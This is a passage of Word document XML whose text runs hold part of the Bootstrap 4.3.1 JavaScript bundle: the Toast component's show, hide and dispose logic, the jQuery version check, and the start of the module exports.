      <w:r>
        <w:t xml:space="preserve">    animation: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    autohide: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    delay: 'number'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Default$7 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    animation: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    autohide: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    delay: 500</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var Selector$a = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_DISMISS: '[data-dismiss="toast"]'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    /**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 Class Definition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">     * ------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">     */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/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var Toast =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  /*#__PURE__*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    function Toast(element, config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element = element;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._config = this._getConfig(config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._timeout = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._setListeners();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    } // Getters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  var _proto = Toast.prototype;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    // Public</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    _proto.show = function show() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).trigger(Event$a.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._config.animation) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._element.classList.add(ClassName$a.FADE);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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      var complete = function complete() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this._element.classList.remove(ClassName$a.SHOWING);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this._element.classList.add(ClassName$a.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(_this._element).trigger(Event$a.SHOWN);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (_this._config.autohide) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this.hide();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this._element.classList.remove(ClassName$a.HIDE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.classList.add(ClassName$a.SHOWING);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._config.animation) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var transitionDuration = Util.getTransitionDurationFromElement(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);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complete();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_proto.hide = function hide(withoutTimeout) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      var _this2 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!this._element.classList.contains(ClassName$a.SHOW)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return;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t xml:space="preserve">      $(this._element).trigger(Event$a.HIDE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (withoutTimeout) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._close();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this._timeout = setTimeout(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this2._close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        }, this._config.delay);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_proto.dispose = function dispose() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      clearTimeout(this._timeout);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._timeout = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._element.classList.contains(ClassName$a.SHOW)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._element.classList.remove(ClassName$a.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      $(this._element).off(Event$a.CLICK_DISMISS);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $.removeData(this._element, DATA_KEY$a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._config = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    } // Private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_proto._getConfig = function _getConfig(config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      config = _objectSpread({}, Default$7, $(this._element).data(), typeof config === 'object' &amp;&amp; config ? config : {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Util.typeCheckConfig(NAME$a, config, this.constructor.DefaultType);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return config;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_proto._setListeners = function _setListeners() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this3 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).on(Event$a.CLICK_DISMISS, Selector$a.DATA_DISMISS, function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return _this3.hide(true);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_proto._close = function _close() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this4 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var complete = function complete() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        _this4._element.classList.add(ClassName$a.HIDE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(_this4._element).trigger(Event$a.HIDDEN);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.classList.remove(ClassName$a.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._config.animation) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var transitionDuration = Util.getTransitionDurationFromElement(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        complete();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 // Static</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    Toast._jQueryInterface = function _jQueryInterface(config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return this.each(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var $element = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var data = $element.data(DATA_KEY$a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var _config = typeof config === 'object' &amp;&amp; config;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (!data) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          data = new Toast(this, _config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          $element.data(DATA_KEY$a, data);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (typeof config === 'string') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (typeof data[config] === 'undefined') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            throw new TypeError("No method named \"" + config + "\"");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          data[config](this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    _createClass(Toast, null, [{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      key: "VERSION",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VERSION$a;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"DefaultType",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      get: function get() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return DefaultType$7;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}, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      key: "Default",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      get: function get() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return Default$7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    }]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Toast;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  }();</w:t>
      </w:r>
    </w:p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 jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * 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/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$a] = Toast._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$a].Constructor = Toast;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$a].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME$a] = JQUERY_NO_CONFLICT$a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Toast._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  /**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * --------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * Bootstrap (v4.3.1): index.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * --------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  (function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (typeof $ === 'undefined') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      throw new TypeError('Bootstrap\'s JavaScript requires jQuery. jQuery must be included before Bootstrap\'s JavaScript.');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var version = $.fn.jquery.split(' ')[0].split('.');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var minMajor = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var ltMajor = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var minMinor = 9;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var minPatch = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var maxMajor = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (version[0] &lt; ltMajor &amp;&amp; version[1] &lt; minMinor || version[0] === minMajor &amp;&amp; version[1] === minMinor &amp;&amp; version[2] &lt; minPatch || version[0] &gt;= maxMajor) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      throw new Error('Bootstrap\'s JavaScript requires at least jQuery v1.9.1 but less than v4.0.0');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  })();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Util = Util;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Alert = Alert;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Button = Button;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  exports.Carousel = Carousel;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Collapse = Collapse;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Dropdown = Dropdown;</w:t>
      </w:r>
    </w:p>
